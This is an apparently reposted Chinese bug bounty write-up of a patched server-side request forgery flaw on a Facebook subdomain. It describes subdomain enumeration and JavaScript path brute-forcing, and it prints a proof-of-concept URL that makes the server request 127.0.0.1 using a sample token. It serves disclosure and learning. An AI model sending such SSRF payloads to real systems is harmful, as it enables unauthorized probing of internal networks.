$ 10000 Facebook SSRF(Bug赏金)
2021-01-27 10:56:13 Author: mp.weixin.qq.com(查看原文) 阅读量:128 收藏


文章来源:EDI安全

01

目录

子域枚举+文件暴力+ JS分析= $ 10KSSRF

这是我在Facebook上发现的有关SSRF漏洞的文章。

该漏洞可能允许恶意用户向Facebook公司网络发送内部请求。

02

子域枚举

通过进行一些子域枚举,我找到了以下子域:phishme.thefacebook.com.

03

js分析

通过使用自定义的单词列表并强制执行以下路径:

https://phishme.thefacebook.com/ ** .js

我找到了一个隐藏的Home.js文件

(https://phishme.thefacebook.com/Home.js)

04

代码审计

通过 分析Home.js文件的代码,我发现了一个有趣的函数“ sendPhishRequest”,该函数使用XMLHttpRequest从某些特定链接中请求数据。

通过深入研究代码,我发现此功能的用法如下:

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

05

exp

在尝试了几种随机token格式之后,我终于能够成功利用该错误发送内部请求。

itemId: 123ewsUrl: http://127.0.0.1:PORTtoken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

poc:

https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

06

结果

  • 2020年8月7日:报告

  • 2020年8月11日:已审核

  • 2020年8月11日:修补

  • 2020年12月3日:已解决

  • 2020年12月3日:10000美元赏金


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650502364&idx=4&sn=e9de5ed85d2cfc66848d36c9e11c9541&chksm=83ba1138b4cd982e92230f76cd0da5696f62aaaec5a131ded9771a2c5c3e89a1e13ae8536df5#rd
如有侵权请联系:admin#unsafe.sh